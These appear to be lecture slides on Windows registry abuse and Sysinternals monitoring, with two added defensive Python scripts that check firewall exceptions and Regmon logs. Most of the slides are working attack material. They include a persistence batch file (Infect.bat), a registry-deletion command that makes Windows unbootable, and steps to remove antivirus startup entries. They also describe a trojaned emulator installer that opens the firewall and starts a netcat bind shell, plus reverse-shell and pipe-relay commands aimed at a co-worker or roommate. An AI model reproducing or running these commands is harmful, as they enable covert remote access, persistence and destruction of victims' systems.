System Monitoring with Sys-Internals
http://www.sys-internals.com
Section 1: Registry Manipulation and Having Evil Fun

Registry
- Part of Windows that stores program information
- System settings are stored in the registry
- Replaced the old startup mechanisms (Autoexec.bat, .ini files)
- Essential to Windows operation
Structure
- Registry divided into hives
- Like a folder hierarchy
- Keys are located in the lower levels of hives
Parts of the Registry
HKEY_CURRENT_USER
- Information and profile of the currently logged-on user
HKEY_USERS
- All loaded user profiles
HKEY_LOCAL_MACHINE
- Configuration information particular to the computer
HKEY_CLASSES_ROOT
- View of LOCAL_MACHINE\SOFTWARE\Classes (merged with the current user's Classes): file associations and COM class registrations
HKEY_CURRENT_CONFIG
- The hardware profile currently in use (a view into LOCAL_MACHINE\SYSTEM)
Software
Regedit
- Built into Windows
- GUI registry editor
Regmon
- Sysinternals tool that monitors all registry accesses and activity
- Has filtering capabilities
- Will be used to detect malicious keys and what they do
Batch Files
- Combine commands into a simple program
Jetico Firewall
- For a simple key demonstration
Structure of a Key
A key holds named values; each value appears in Regedit as
Name | Type | Data
Modifying Keys
(REG.EXE operates on the values inside a key. The slides use the Resource Kit reg.exe syntax; the equivalent for the reg.exe built into Windows XP is given in parentheses.)
1) Adding a value:  REG ADD RegistryPath /v Name /d Data
2) Modifying an existing value:  REG UPDATE RegistryPath /v Name /d Data
   (the XP built-in reg.exe has no UPDATE command; overwrite with REG ADD RegistryPath /v Name /d Data /f)
3) Deleting a key:  REG DELETE RegistryPath [/FORCE]
   (XP built-in: REG DELETE RegistryPath /f; add /v Name to delete a single value instead of the whole key)
Lab Situation
- Virus gets installed on a system
- User deletes the virus, but on restart the virus comes back
- One way a hacker can do this is via the registry
- The following key contains startup program information:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Re-installation
- Batch file: Infect.bat
- Infect.bat and the virus sit on the system in a hidden folder
- Infect.bat copies the virus to the Windows directory, renames it to MrMalicious, and runs it
- User sees the virus in Task Manager, searches the hard drive and deletes MrMalicious, thinking he or she is da bomb
Uh-Oh
- Infect.bat re-infects the system on startup because of the startup registry key
- The hidden viral file is still on the system
- MrMalicious comes back
- User is not da bomb
Note: MrMalicious for this lab just takes up CPU time and runs in the background.
Viral Code (Infect.bat)
rem Register Infect.bat to run at every boot. /f is added so that a re-run on the
rem next boot silently overwrites the value instead of blocking on "overwrite (Yes/No)?"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Process /d "C:\WINDOWS\HiddenFolder\Infect.bat" /f
rem Stash a copy of the batch file and of the virus in the hidden folder
MD "C:\WINDOWS\HiddenFolder\"
rem attrib +h added: MD alone does not hide the folder the slides describe as hidden
attrib +h "C:\WINDOWS\HiddenFolder"
copy Infect.bat "C:\WINDOWS\HiddenFolder\"
copy RenameMe.exe "C:\WINDOWS\HiddenFolder\"
rem The second copy goes into the Windows directory, where it is renamed and launched
copy RenameMe.exe "C:\Windows\"
cd "C:\Windows"
Ren RenameMe.exe "MrMalicious.exe"
Start MrMalicious.exe
exit
Turning off Antivirus/Firewalls
- Before going over detection, we will examine how to turn off important anti-virus programs.
- Wouldn't it be nice not to have to deal with a victim's firewall?
Removal of Startup Programs
Simple process
1. Delete all startup keys manually on the hacker's system
2. Back up the key folder by exporting it
3. Have the virus replace the startup folder with the empty backup
- Importing a registry backup (.reg) merges its contents into the current location
- Caveat: importing a plain export of an emptied key does not remove values that already exist on the victim; regedit's import only adds and overwrites. To actually wipe the key, the .reg file needs the deletion syntax: [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] removes the whole key, and "Name"=- listed under a key removes a single value.
- Could also use the REG QUERY command from software to find and remove all values whose name or data contains "norton" or "zonealarm" in a specified hive
Detection
- Regmon: GUI-based registry logger
- Lots of registry accesses per second on a Windows system
- A typical program install requires around 150,000 registry accesses
- How can we find malicious keys with so many reads/writes to the registry?
Filtering Cont'd
- The user can filter out normal processes such as Explorer.exe, svchost, etc.
- Logged entries can be cut down to just a few hundred
- Now it is easier to find where malicious keys have been added
- Caveat: a process-name filter also hides anything malware does under a trusted name (a dropped svchost.exe, a DLL injected into Explorer). Filter on the keys being written (Run, RunOnce, ...) and on the SetValue/CreateKey operations as well as on process name.
Evil Fun Time: Disable OS
- The registry is key to the operation of Windows
- Unfortunately, it can easily be modified to make Windows unstable and unbootable
- Easy way to make enemies
- Not fun for the victim machine
"REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE /FORCE"
(Resource Kit syntax; the XP built-in reg.exe uses /f. Only run this in a disposable lab VM.)
Recovery from Reg Deletion
- System not bootable even in safe mode after the previous line of code is run!!!
- "Last Known Good Configuration" does not help either: it only rolls back the control set in the SYSTEM hive, not the SOFTWARE hive that was deleted
- To recover normal program operation, you must have a backup copy of the whole registry
- Without a backup copy, every program not included on the Windows installation CD must be re-installed
- Advice: start backing up your registry
- ERUNT is software that can back up and re-insert the whole registry easily
  http://www.snapfiles.com/download/dlerunt.html
Poking Holes in the Firewall from the Command Line
Show the current exceptions:
C:\> netsh firewall show portopening

Poking Holes in the Firewall from the Command Line cont.
- What happens when we try to use Netcat to listen on a closed port? nc binds the port, but the Windows Firewall blocks inbound connections to it until an exception exists (on XP SP2 an interactive user may also get a Windows Security Alert asking whether to unblock the program).

Poking Holes in the Firewall from the Command Line cont.
- If the firewall is set to not allow exceptions, reset it to the defaults:
C:\> netsh firewall reset
- The firewall default allows exceptions (the reset also discards every exception the user had added, which is noticeable)
- After exceptions are allowed, add the desired exception:
C:\> netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL
(netsh firewall is the XP SP2 syntax; later Windows versions use netsh advfirewall)
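The defensive counterpart of the commands above is to diff the firewall's exception list against what the machine is supposed to have. The following is an added example (not from the slides): it parses a constructed approximation of `netsh firewall show portopening` output (the real layout may differ slightly) and reports every enabled exception that is not in an assumed baseline of XP SP2's File and Printer Sharing ports. The `protocol = ALL` opening from the slide shows up as one TCP row and one UDP row.

```python
"""Spot firewall exceptions that are not part of an expected baseline.

Added example, not code from the slides. SAMPLE_OUTPUT is a constructed
approximation of `netsh firewall show portopening`; BASELINE is an assumed
list of the (protocol, port) exceptions XP SP2 enables by default.
"""
import re

# Assumed baseline: exceptions we expect to see enabled on an untouched XP SP2 box.
BASELINE = {("TCP", 139), ("TCP", 445), ("UDP", 137), ("UDP", 138)}

# Constructed sample (not a real capture): Standard profile after the slides'
# "add portopening protocol = ALL port = 8633 name = nc" call.
SAMPLE_OUTPUT = """
Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
8633   TCP       Enable   nc
8633   UDP       Enable   nc
"""

PROFILE_RE = re.compile(r"^Port configuration for (\w+) profile:")
# One exception row: port, protocol, mode, free-text name (header/separator rows do not match).
ROW_RE = re.compile(r"^\s*(\d{1,5})\s+(TCP|UDP)\s+(Enable|Disable)\s+(\S.*?)\s*$")


def parse_portopenings(text):
    """Return one dict per exception row, tagged with the profile it belongs to."""
    profile, rows = None, []
    for line in text.splitlines():
        m = PROFILE_RE.match(line)
        if m:
            profile = m.group(1)
            continue
        m = ROW_RE.match(line)
        if m and profile is not None:
            rows.append({"profile": profile, "port": int(m.group(1)),
                         "proto": m.group(2), "mode": m.group(3), "name": m.group(4)})
    return rows


def unexpected_openings(text, baseline=BASELINE):
    """Enabled exceptions whose (protocol, port) pair is not in the baseline."""
    return [r for r in parse_portopenings(text)
            if r["mode"] == "Enable" and (r["proto"], r["port"]) not in baseline]


if __name__ == "__main__":
    for r in unexpected_openings(SAMPLE_OUTPUT):
        print(f'{r["profile"]:8} {r["proto"]} {r["port"]:>5}  "{r["name"]}"')
```

Compare on (protocol, port) rather than on the name: the name is chosen by whoever added the exception and can be set to look like a legitimate service.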
Hypothetical Scenario
Let us pretend we are a hacker with not-so-pleasant intentions operating from a RedHat 7.2 machine. The Windows XP machine is being operated by a co-worker, schoolmate, roommate, or anyone you can think of who would be found on the same network as you (i.e. no router is separating you).

Hypothetical Scenario cont.
Suppose we give our friend the Windows XP user a self-extracting Zip program that installs the ZSNES Super Nintendo emulator. Unfortunately for the Windows XP user, we have also made it so this self-extracting zip installs Netcat and runs a C program we wrote named installer.exe.
How the 8633 Exploit Works
- installer.exe makes 9 system() calls
- The first system call moves an .exe called process to c:\Windows\system32
- The second call executes process -k nc.exe; this kills all instances of Netcat in case the exploit has already been run on this machine, so as not to cause an error

How the 8633 Exploit Works cont.
- The third call moves nc.exe to C:\Windows\system32; nc.exe is Netcat!
- The fourth call moves server.exe to C:\Windows\system32
- The fifth call resets the Windows firewall in case it is set to not allow any exceptions: netsh firewall reset

How the 8633 Exploit Works cont.
- The sixth system call is "netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL", which opens up the firewall on port 8633 for Netcat.
- The seventh system call, "reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f", adds a value to the Run key so that server.exe runs whenever the computer is booted (strictly, whenever a user logs on).
Changing the Registry to Run a Program When Starting Windows
The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- Launches program when the specific user logs in
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
- Launches program the next time the specific user logs in, then the value is removed from the registry
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- Launches program automatically at system startup, i.e. whenever any user logs on * (key modified by installer.c)
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
- Launches program automatically on the next startup, then the value is removed from the registry
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
- Launches service automatically at system startup (e.g. AIM)
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
- Launches service automatically on the next startup, then the value is removed from the registry
Caveat: RunServices and RunServicesOnce are Windows 9x/ME keys; NT-based Windows, XP included, does not process them. An XP persistence check should concentrate on the four Run/RunOnce keys, plus the real services list under HKLM\SYSTEM\CurrentControlSet\Services.
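The Detection and Filtering slides ask how to find a malicious key among hundreds of thousands of Regmon entries; the list above says which keys matter. The following added example (not code from the slides or from Sysinternals) puts the two together: it reads Regmon-style tab-separated log lines (constructed here to mimic Regmon's export; the real column layout may differ), keeps only successful write operations, and reports those whose path falls under one of the six autorun keys. The optional process filter reproduces the slides' "filter out explorer.exe, svchost" trick, and the sample shows the blind spot it opens.

```python
"""Triage a Regmon log for writes to the autorun keys.

Added example, not code from the slides. SAMPLE_LOG is constructed to mimic
Regmon's tab-separated export (sequence, time, process:pid, request, path,
result, other); a real export may differ in detail.
"""
from dataclasses import dataclass

# The six autorun keys from the slides, in Regmon's abbreviated hive spelling.
AUTORUN_KEYS = (
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce",
)
# Requests that change the registry; reads of Run keys are normal (Explorer enumerates them at logon).
WRITE_REQUESTS = {"SetValue", "CreateKey", "DeleteValue", "DeleteKey"}
# The slides' Regmon process filter: names treated as "normal" and excluded.
NOISE_PROCESSES = {"explorer.exe", "svchost.exe", "regmon.exe"}

# Constructed sample log (not a real capture). Line 4 is Infect.bat's reg add,
# line 5 is installer.exe's Run value, line 3 is a write under a trusted name.
SAMPLE_LOG = [
    "1\t0.00000000\texplorer.exe:1552\tOpenKey\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\tSUCCESS\tAccess: 0x20019",
    "2\t0.00001200\texplorer.exe:1552\tEnumerateValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\tSUCCESS\t0: SoundMAX",
    "3\t0.00020000\tsvchost.exe:1040\tSetValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Tray\tSUCCESS\t\"C:\\WINDOWS\\system32\\tray.exe\"",
    "4\t1.23450000\treg.exe:2016\tSetValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Process\tSUCCESS\t\"C:\\WINDOWS\\HiddenFolder\\Infect.bat\"",
    "5\t2.00000000\tinstaller.exe:2240\tSetValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\update\tSUCCESS\t\"c:\\windows\\system32\\server.exe\"",
    "6\t2.50000000\tinstaller.exe:2240\tSetValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\ZSNES\\DisplayName\tSUCCESS\t\"ZSNES\"",
    "7\t3.00000000\tsetup.exe:2300\tSetValue\tHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Cleanup\tACCDENIED\t",
]


@dataclass
class Hit:
    seq: int
    process: str
    request: str
    key: str
    value_name: str
    data: str


def _split_autorun_path(path):
    """Return (autorun key, value name) when path is under one of AUTORUN_KEYS, else None."""
    norm = path.replace("HKEY_LOCAL_MACHINE", "HKLM").replace("HKEY_CURRENT_USER", "HKCU")
    low = norm.lower()
    for key in AUTORUN_KEYS:
        k = key.lower()
        if low == k:
            return key, ""
        if low.startswith(k + "\\"):   # child of the key is a value name (these keys have no subkeys)
            return key, norm[len(key) + 1:]
    return None


def find_autorun_writes(lines, drop_noise_processes=False):
    """Successful write operations under the autorun keys, in log order.

    drop_noise_processes=True applies the slides' process filter; note that it
    also hides sample line 3, a Run write made under the svchost.exe name.
    """
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) < 6:
            continue
        seq, _time, proc_pid, request, path, result = parts[:6]
        data = parts[6] if len(parts) > 6 else ""
        process = proc_pid.rsplit(":", 1)[0].lower()
        if request not in WRITE_REQUESTS or result != "SUCCESS":
            continue
        if drop_noise_processes and process in NOISE_PROCESSES:
            continue
        where = _split_autorun_path(path)
        if where is None:
            continue
        key, value_name = where
        hits.append(Hit(int(seq), process, request, key, value_name, data))
    return hits


if __name__ == "__main__":
    for h in find_autorun_writes(SAMPLE_LOG):
        print(f"#{h.seq} {h.process} {h.request} {h.key}\\{h.value_name} = {h.data}")
```

Writes to these keys are rare enough that filtering on the key and operation alone already reduces a 150,000-entry install log to a handful of lines, so the process filter is not needed there and is best left off; failed attempts (ACCDENIED) are skipped above but are worth a second pass, since they show what a non-admin dropper tried to do.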
How the 8633 Exploit Works cont.
- The eighth system call runs Netcat. Because nc.exe stays resident as a listener, it is launched through start so that the installer's own command prompt can close without taking the listener with it:
  system("start /d \"c:\\windows\\system32\\\" nc -L -p 8633 -e cmd.exe -d");
- The ninth system call is just an exit command, needed to close the second instance of the cmd shell.
What server.exe Does and What Netcat Is Doing
- server.exe was added to the registry by installer.exe so that it runs every time the system boots. Every time the system is restarted, it launches Netcat listening on port 8633, and Netcat hands a cmd.exe shell to whoever connects with Netcat from another machine.
- Netcat is run with the -L and -d options: -d detaches from the console so nothing is visible, and -L ("listen harder") makes it re-open the listener after each client disconnects.
C:\> nc -L -p 8633 -e cmd.exe -d
Files in the Zip File, and Creating the Self-Extractor
Going Back to the Hypothetical Scenario
Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly even a little Ogre Battle, the unsuspecting Windows XP user is more than happy to take and install the emulator you give him. After he installs it, you have administrative access to his machine for as long as you are on the same network with him (assuming he is not extremely knowledgeable of his registry or firewall, and doesn't decide to format his hard drive).

How to Access Our Friend the Windows XP User's Computer
- Since Netcat is listening on his computer whenever the computer is on, with the command C:\> nc -L -p 8633 -e cmd.exe -d
- All we have to do is run nc x.x.x.x 8633, where x.x.x.x is his IP address, and we have access.

Why Port 8633
- Because spelling out TODD numerically on cell phones etc. is done by 8-6-3-3
- TODD is my name, and I came up with this particular exploit, and I had to pick a port, so why not 8633
A New Scenario
Suppose we want to gain access to our friend the Windows XP user's computer (who, by the way, is probably not our friend, otherwise we wouldn't be continuously hacking his computer), and this time he is not on the same network as we are.

A New Scenario cont.
In order to do this, we will edit our code slightly from the previous exploit. Rather than having the Windows user in listening mode, we will put our Linux machine in listen mode and have his machine seek out a connection with us. In both server.c and installer.c we will change
"c:\nc -L -p 8633 -e cmd.exe -d" to
"c:\nc our_i.p. 80 -e cmd.exe -d"
(With a reverse connection the victim's firewall exception and the netsh calls are no longer needed, since the XP firewall does not filter outbound traffic, and port 80 is chosen because outbound web traffic is rarely blocked. The -L re-listen behaviour is gone too: each reboot yields one connection, so server.exe has to loop the nc call if you want it to reconnect.)

A New Scenario cont.
- Make sure our router is set to forward the traffic coming in on port 80 to our machine.
- Then we put our machine in listen mode with the command:
# nc -vv -l -p 80
- Then we wait
One Final Example
Running commands from one port and receiving on another
- We can use Netcat to send commands through the cmd.exe shell, taking commands in from one port and sending them out another

One Final Example cont.
- Set up two listening ports on your machine:
nc -vv -l -p 80
nc -vv -l -p 25
- Then on the Windows machine run "nc x.x.x.x 80 | cmd.exe | nc x.x.x.x 25", where x.x.x.x is your IP address.
- This allows you to run commands from port 80 and receive the results on port 25. The pipeline needs no -e option, so it also works with a Netcat build that was compiled without -e support.
Section 4: Unleashing a Wild Boar
- Active monitoring tools
  - Process Explorer
- Activity logging
  - Registry monitoring
  - File monitoring
  - Network monitoring
- Call stack
- Logging traffic

Process Explorer
- Show CPU/memory usage
- Show active network ports
- Show process threads

Ethereal
- Logs network traffic
- Become familiar with extracting TCP flows

Registry/File Monitoring
- The file monitoring utility (Filemon) is a clone of the registry monitoring utility (Regmon).
- What can you see?
  - Process name
  - Opens & closes
  - Reads & writes
  - Attempts & failures